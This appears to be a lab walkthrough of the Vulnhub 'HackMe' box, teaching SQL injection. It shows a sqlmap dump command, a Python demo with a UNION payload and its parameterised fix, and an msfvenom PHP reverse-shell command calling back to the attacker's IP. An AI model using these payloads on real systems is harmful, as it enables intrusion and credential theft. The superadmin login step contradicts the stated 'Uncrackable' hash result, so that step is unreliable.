HackMe is a quick little boot to root box available on Vulnhub, which was created by user x4bx54. This is another beginner level box, that offers a good intro to basic SQL injection using pre-made tools. In the future I am planning on adding another post which walks through the manual exploitation of the SQL injection in order to help me better understand it.
I used Parrot OS on bare metal for this tutorial, so if you are using Kali, some of the commands may be slightly different, and your shell prompt will most likely not match mine exactly. The HackMe machine is running in VMware. The exploitation will be basically the same even if your setup doesn't match this exactly. Upon starting the HackMe machine we are greeted with a simple login page, so the first step will be obtaining the IP address of the target machine on the local network.
The easiest way to do this is to run nmap -sP 192.168.0.0/24 (-sP is the old name for the -sn ping sweep; both are accepted) before turning on the HackMe box, and then run the same command again after the box is turned on. Whichever IP appears the second time but was not there the first is the IP we will be targeting. In this case the IP my box was assigned was 192.168.0.146, and that is what I will be using throughout the rest of this walkthrough; your specific IP will most likely be different. Also, the initial scan range depends on your router's subnet and will need to be adjusted accordingly. As a last resort, you can always log onto your router's admin page and see which devices are new. Note that this only works if you are running the VM in bridged mode, since that is what puts the VM on the same subnet as your router and your attacking machine.
Now that I know the IP address I am looking for, I will run a port scan on the specific box with nmap -sC -sV -oA hackme 192.168.0.146. This scans the 1000 most common TCP ports, runs the default NSE scripts (-sC), enumerates service versions where possible (-sV), and writes the results in all three output formats (-oA) to hackme.nmap, hackme.gnmap and hackme.xml.

From this we can see that there are two ports open: HTTP on port 80 and SSH on port 22. I will start with the website by navigating my browser to http://192.168.0.146.

Here I am greeted with a standard login page, where I make an account using chris:password. This works and redirects me to a book search page.


I tried a number of different books here and got no results, and for a bit I wondered whether there were any books to be viewed at all. Then I clicked search with the box left empty and was greeted with a list of every book, which suggests the search term is being dropped into a wildcard pattern on the server side.

From here I decided to run sqlmap and test for any sort of SQL injection issue the site might have. Before I could do this, however, I needed a few pieces of information: any cookies I would need to send when accessing the site, and the exact way the search term was sent to the server. To find the cookies, I opened developer tools in Firefox, clicked on the Storage tab, and saw that there is one cookie called PHPSESSID with a value of rrvcd91s58ssj0t86q3eisfgnm. This is the session cookie that keeps me logged in, so sqlmap will need it to reach the search page at all. I noted it for later use.

Next, I needed to see how the data was sent. I moved to the Network tab in the developer tools, reloaded the page, clicked on the request with status code 200, and then clicked on the Params tab within that request to see what data had been sent. There was a key called search with no value, since I had previously sent an empty value to get all the books. So the search is a single field named search, posted to welcome.php. I noted this as well and prepared to run sqlmap.
The command I used was sqlmap -u http://192.168.0.146/welcome.php --data="search=1" --cookie="PHPSESSID=rrvcd91s58ssj0t86q3eisfgnm" --dump --batch. You will need to substitute your own PHPSESSID value in this command. The --data flag makes sqlmap send the search field as a POST body (the same way the form does), the --dump flag tells sqlmap to dump table entries, and the --batch flag tells it to accept the default answer to every prompt instead of stopping to ask.
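Since the injection lives in the search parameter, here is the mechanism sqlmap is automating, as an added example that is not part of the original post or the box's own code. It uses an in-memory SQLite database with constructed books and users rows (the hashes are placeholders, not values from the box) and assumes the search query is built by concatenating the term into a LIKE pattern, which is the usual cause of this bug and fits the observation that an empty search listed every book. The real box almost certainly runs MySQL behind PHP rather than SQLite, so the exact error messages differ, but the same probe and the same UNION payload apply there.

```python
import sqlite3

# Constructed sample data standing in for the box's database: a books table
# (what the search page lists) and a users table of the kind sqlmap's --dump
# pulled out. The hash values are placeholders, not rows from the real box.
BOOKS = [
    ("The Hobbit", "J.R.R. Tolkien"),
    ("Dune", "Frank Herbert"),
    ("Neuromancer", "William Gibson"),
]
USERS = [
    ("chris", "5f4dcc3b5aa765d61d8327deb882cf99"),   # md5("password")
    ("superadmin", "placeholder-hash-not-from-the-box"),
]


def build_db():
    """In-memory SQLite database holding the two constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (name TEXT, author TEXT)")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?)", BOOKS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def search_vulnerable(conn, term):
    """Assumed shape of the page's search: the term is concatenated straight
    into a LIKE pattern. An empty term becomes LIKE '%%', which matches every
    book, the same behaviour the empty search on the site showed."""
    query = "SELECT name, author FROM books WHERE name LIKE '%" + term + "%'"
    return conn.execute(query).fetchall()


def search_safe(conn, term):
    """Hardened form: the pattern is a bound parameter, so quotes inside the
    term are data and can never close the string literal."""
    query = "SELECT name, author FROM books WHERE name LIKE ?"
    return conn.execute(query, ("%" + term + "%",)).fetchall()


def search_errors(conn, term):
    """Error-based probe: does the vulnerable search choke on this term?
    A single unbalanced quote breaking the query is the classic first sign
    of injection and one of the things sqlmap tries early."""
    try:
        search_vulnerable(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


# The UNION payload closes the LIKE string, appends a second SELECT with the
# same number of columns (two) reading from users, and comments out the
# trailing %' that the application appends. The space after -- is required
# by MySQL as well, so keep it.
UNION_PAYLOAD = "' UNION SELECT user, password FROM users -- "


if __name__ == "__main__":
    conn = build_db()
    print("empty search:", search_vulnerable(conn, ""))
    print("probe x' raises an error:", search_errors(conn, "x'"))
    print("union dump via vulnerable query:", search_vulnerable(conn, UNION_PAYLOAD))
    print("same payload via parameterised query:", search_safe(conn, UNION_PAYLOAD))
```

The UNION only works because the injected SELECT returns the same number of columns as the original one; when doing this by hand you find that count with ORDER BY n or a UNION SELECT NULL,NULL,... that grows until the error disappears, which is exactly the step sqlmap performs before it starts dumping.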

As you can see from the output above, the dump contained the users table with password hashes, and sqlmap's built-in dictionary attack recovered every user's password except superadmin's. To get that one I simply copied the hash and pasted it into CrackStation, which reported the password as Uncrackable.

The next step was to log into this website as the superadmin. When logging in as superadmin, instead of being directed to the book search page, I was instead directed to an upload page.

Knowing from the URL that this server runs PHP, I decided to create a PHP Meterpreter reverse shell payload with msfvenom using the command msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.117 lport=443 -o shell.php. The lhost option will need to be adjusted to your listener's IP, that is, the attacking machine rather than the target. I then used the form on the website to upload this to the server. With the file uploaded I just needed to set up a listener in Metasploit, using exploit/multi/handler with the same payload, LHOST and LPORT as the msfvenom command.

Once the listener was up and running, I navigated to http://192.168.0.146/uploads in my browser and clicked the shell.php file. My listener immediately responded with a new connection.


After searching for a bit I found the file /home/legacy/touchmenot. Seeing that it was executable by anyone, and with a name like that, I immediately ran it, and as can be seen below, running this file gave me root and completed the box. A binary that hands root to whoever runs it is almost certainly setuid root, so listing setuid files is the check worth doing first on any box like this.

Overall, this was a fun little box. It really makes me want to dive more into SQL injection though, as I couldn’t get the injection to work by hand, and had to use sqlmap to get it to work. Thanks for reading, I hope you enjoyed this walkthrough.